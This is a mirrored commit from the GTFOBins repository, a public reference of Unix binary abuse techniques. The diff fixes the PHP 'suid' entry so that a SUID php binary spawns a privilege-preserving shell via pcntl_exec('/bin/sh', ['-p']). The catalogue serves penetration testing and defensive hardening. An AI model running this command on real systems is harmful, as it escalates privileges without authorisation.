mirror of
				https://github.com/GTFOBins/GTFOBins.github.io
				synced 2025-10-31 08:48:54 +01:00 
			
		
		
		
	Fix suid in PHP
This commit is contained in:
		| @@ -41,7 +41,7 @@ functions: | ||||
|   suid: | ||||
|     - code: | | ||||
|         CMD="/bin/sh" | ||||
|         ./php -r "system('$CMD');" | ||||
|         ./php -r "pcntl_exec('/bin/sh', ['-p']);" | ||||
|   sudo: | ||||
|     - code: | | ||||
|         CMD="/bin/sh" | ||||
|   | ||||
		Reference in New Issue
	
	Block a user